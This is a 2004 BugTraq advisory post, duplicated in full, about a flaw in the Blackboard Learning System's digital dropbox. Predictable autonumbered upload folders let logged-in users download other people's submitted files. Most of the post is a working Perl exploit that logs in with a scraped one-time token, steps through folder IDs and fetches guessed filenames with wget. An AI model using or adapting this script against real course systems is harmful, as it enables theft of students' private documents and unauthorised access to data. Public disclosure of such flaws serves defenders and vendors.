BugTraq
Back to list
|
Post reply
Blackboard Learning System - Stealing documents out of the digital dropbox
Jun 10 2004 08:14PM
Maarten Verbeek (system_error pandora be)
Advisory:
Blackboard Learning System - Stealing documents out of the digital dropbox
========================================================================
==
Blackboard
----------
The Blackboard Learning System is a Web-based server software platform that offers course management.
More information can be found on: http://www.blackboard.com/
Affected Systems
----------------
Blackboard Learning System - Basic Edition? (Release 6)
This is the only version on which i was able to test the bug.
Probably more versions are affected.
Overview
--------
A bug in blackboard allows users to steal documents out of the digital dropbox of other users.
Details
-------
Each course has it's own digital dropbox.
it can be found for example in:
http://blackboard.nosite.org/courses/1/my_course/uploads/
The digital dropbox is a function in the blackboard system.
It can be found under a course/tools/digital dropbox
This function allows blackboard users to submit files to the course administrators.
When submitting a file into the digital dropbox, the users have 2 options:
-Add File: put's the file into the digital dropbox but doesn't sends it to the course administrators
-Submit File: put's a file into the digital dropbox and send it to the course administrators
(Sending the file wil probably send a notification that a file is dropped)
If a file is submitted it wil be dropped in a folder like this:
http://blackboard.nosite.org/courses/1/my_course/uploads//_19064_1/testf
ile.txt
For each file that is dropped, a new folder is created:
_19064_1
The number 19064 in this folder is an autonumber.
We can easily find the current number by just adding a file to the digital drop box.
This file won't be send to the course administrators.
Files in the folder don't have a form of security.
But we are unable to see which file is in the folder.
But since the software is created for educational purpose, filenames can be guessed easy.
Since schools often have rules for naming a file.
So if we change the URL, it is possible to get files out of other people's digital dropbox:
http://blackboard.nosite.org/courses/1/my_course/uploads//_19063_1/file_
i_want.txt
http://blackboard.nosite.org/courses/1/my_course/uploads//_19062_1/file_
i_want.txt
http://blackboard.nosite.org/courses/1/my_course/uploads//_19061_1/file_
i_want.txt
...
By doing this we have a good chance to find files that we want.
------------------------------------------------------
killer
06/05/2004
system_error_at_pandora.be
http://www.mostly-harmless.nl/
------------------------------------------------------
Exploit Code:
#!/usr/bin/perl
use strict;
use LWP;
use URI;
use Digest::Perl::MD5 'md5_hex';
use MIME::Base64;
#################################################################
# #
# fill in these 3 variables to your situation #
# #
#################################################################
my $url_to_bb = "http://blackboard.example.org/";
my $user = 'username';
my $password = 'password';
my $encryption = 'md5'; # this may also be base64
#################################################################
# The code for the logging in onto blackboard. #
# I thank vandreadfull for providing me with this code #
#################################################################
my @headers = ('User-Agent' => 'SQL Injection Tester/1.1b (M & H)',
'Accept-Language' => 'en-US',
'Accept-Charset' => 'iso-8859-1,*,utf-8',
'Accept-Encoding' => '',
'Accept' => '*/*'
);
my $browser = LWP::UserAgent->new(keep_alive => 1);
$browser->cookie_jar({});
print "logging in\n";
my $url = $url_to_bb;
print '.';
$_ = ($browser->get($url, @headers))->content;
#one more time, for some reason (probably a session or something) blackboard doesnt provide us with the one_time_token the first time
$_ = ($browser->get($url."webapps/login", @headers))->content;
my $string = $_;
# Process page to fetch hidden HTML form variables
my %postvars;
$postvars{login} = 'Log In';
$postvars{password} = '';
while ($string =~ m{INPUT VALUE="(.*?)" NAME="(.*?)" TYPE="hidden"}g) {
if ($2 ne 'password') {
$postvars{$2} = $1;
}
}
# Set the username
$postvars{user_id} = $user;
# Setting the password (md5 or base64)
if ($encryption eq 'md5') {
$_ = $string;
/<INPUT VALUE=\"([^"]*)\" NAME=\"one\_time\_token\"/;
my $one_time_token = $1;
$password = md5_hex($password);
$password =~y/a-z/A-Z/;
$password = md5_hex("$password$one_time_token");
$password =~y/a-z/A-Z/;
$postvars{encoded_pw} = $password;
}
if ($encryption eq 'base64') {
$postvars{encoded_pw} = encode_base64($password);
}
# Post login
$url = $url_to_bb."webapps/login";
print '.';
my $response = $browser->post($url, [%postvars], @headers);
# Do another refresh
$_ = $response->content;
$_ =~ m{document\.location\.replace\(\'(.*?)\'\)} || exit 1;
$url = $url_to_bb . $1;
print '.';
$browser->get($url, @headers)->content;
print "logged in\n";
#################################################################
# #
# Fill in these 3 variables according to your needs #
# #
#################################################################
my $path="http://blackboard.example.org/courses/1/my_course/uploads//_19063
_1/";
my @file=("test.txt","doc2.txt");
my $loop=10;
#################################################################
# The code for exploiting the vulnerability #
#################################################################
my $file;
my $wget;
$_=reverse($path);
/_(.*?)_/;
my $autocount=reverse($1);
my $orig_count=$autocount;
$wget="wget -q ";
for(my $t=0;$t<$loop;$t++) {
$autocount--;
$url=$path;
$url=~ s/$orig_count/$autocount/;
foreach $file (@file) {
system("$wget$url$file");
}
}
print("\nDone, if the files existed they should be in this directory.\n\nkiller 2004\nhttp://www.mostly-harmless.nl/");
Kind regards
killer
http://www.mostly-harmless.nl
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Advisory:
Blackboard Learning System - Stealing documents out of the digital dropbox
========================================================================
==
Blackboard
----------
The Blackboard Learning System is a Web-based server software platform that offers course management.
More information can be found on: http://www.blackboard.com/
Affected Systems
----------------
Blackboard Learning System - Basic Edition? (Release 6)
This is the only version on which i was able to test the bug.
Probably more versions are affected.
Overview
--------
A bug in blackboard allows users to steal documents out of the digital dropbox of other users.
Details
-------
Each course has it's own digital dropbox.
it can be found for example in:
http://blackboard.nosite.org/courses/1/my_course/uploads/
The digital dropbox is a function in the blackboard system.
It can be found under a course/tools/digital dropbox
This function allows blackboard users to submit files to the course administrators.
When submitting a file into the digital dropbox, the users have 2 options:
-Add File: put's the file into the digital dropbox but doesn't sends it to the course administrators
-Submit File: put's a file into the digital dropbox and send it to the course administrators
(Sending the file wil probably send a notification that a file is dropped)
If a file is submitted it wil be dropped in a folder like this:
http://blackboard.nosite.org/courses/1/my_course/uploads//_19064_1/testf
ile.txt
For each file that is dropped, a new folder is created:
_19064_1
The number 19064 in this folder is an autonumber.
We can easily find the current number by just adding a file to the digital drop box.
This file won't be send to the course administrators.
Files in the folder don't have a form of security.
But we are unable to see which file is in the folder.
But since the software is created for educational purpose, filenames can be guessed easy.
Since schools often have rules for naming a file.
So if we change the URL, it is possible to get files out of other people's digital dropbox:
http://blackboard.nosite.org/courses/1/my_course/uploads//_19063_1/file_
i_want.txt
http://blackboard.nosite.org/courses/1/my_course/uploads//_19062_1/file_
i_want.txt
http://blackboard.nosite.org/courses/1/my_course/uploads//_19061_1/file_
i_want.txt
...
By doing this we have a good chance to find files that we want.
------------------------------------------------------
killer
06/05/2004
system_error_at_pandora.be
http://www.mostly-harmless.nl/
------------------------------------------------------
Exploit Code:
#!/usr/bin/perl
use strict;
use LWP;
use URI;
use Digest::Perl::MD5 'md5_hex';
use MIME::Base64;
#################################################################
# #
# fill in these 3 variables to your situation #
# #
#################################################################
my $url_to_bb = "http://blackboard.example.org/";
my $user = 'username';
my $password = 'password';
my $encryption = 'md5'; # this may also be base64
#################################################################
# The code for the logging in onto blackboard. #
# I thank vandreadfull for providing me with this code #
#################################################################
my @headers = ('User-Agent' => 'SQL Injection Tester/1.1b (M & H)',
'Accept-Language' => 'en-US',
'Accept-Charset' => 'iso-8859-1,*,utf-8',
'Accept-Encoding' => '',
'Accept' => '*/*'
);
my $browser = LWP::UserAgent->new(keep_alive => 1);
$browser->cookie_jar({});
print "logging in\n";
my $url = $url_to_bb;
print '.';
$_ = ($browser->get($url, @headers))->content;
#one more time, for some reason (probably a session or something) blackboard doesnt provide us with the one_time_token the first time
$_ = ($browser->get($url."webapps/login", @headers))->content;
my $string = $_;
# Process page to fetch hidden HTML form variables
my %postvars;
$postvars{login} = 'Log In';
$postvars{password} = '';
while ($string =~ m{INPUT VALUE="(.*?)" NAME="(.*?)" TYPE="hidden"}g) {
if ($2 ne 'password') {
$postvars{$2} = $1;
}
}
# Set the username
$postvars{user_id} = $user;
# Setting the password (md5 or base64)
if ($encryption eq 'md5') {
$_ = $string;
/<INPUT VALUE=\"([^"]*)\" NAME=\"one\_time\_token\"/;
my $one_time_token = $1;
$password = md5_hex($password);
$password =~y/a-z/A-Z/;
$password = md5_hex("$password$one_time_token");
$password =~y/a-z/A-Z/;
$postvars{encoded_pw} = $password;
}
if ($encryption eq 'base64') {
$postvars{encoded_pw} = encode_base64($password);
}
# Post login
$url = $url_to_bb."webapps/login";
print '.';
my $response = $browser->post($url, [%postvars], @headers);
# Do another refresh
$_ = $response->content;
$_ =~ m{document\.location\.replace\(\'(.*?)\'\)} || exit 1;
$url = $url_to_bb . $1;
print '.';
$browser->get($url, @headers)->content;
print "logged in\n";
#################################################################
# #
# Fill in these 3 variables according to your needs #
# #
#################################################################
my $path="http://blackboard.example.org/courses/1/my_course/uploads//_19063
_1/";
my @file=("test.txt","doc2.txt");
my $loop=10;
#################################################################
# The code for exploiting the vulnerability #
#################################################################
my $file;
my $wget;
$_=reverse($path);
/_(.*?)_/;
my $autocount=reverse($1);
my $orig_count=$autocount;
$wget="wget -q ";
for(my $t=0;$t<$loop;$t++) {
$autocount--;
$url=$path;
$url=~ s/$orig_count/$autocount/;
foreach $file (@file) {
system("$wget$url$file");
}
}
print("\nDone, if the files existed they should be in this directory.\n\nkiller 2004\nhttp://www.mostly-harmless.nl/");
Kind regards
killer
http://www.mostly-harmless.nl
[ reply ]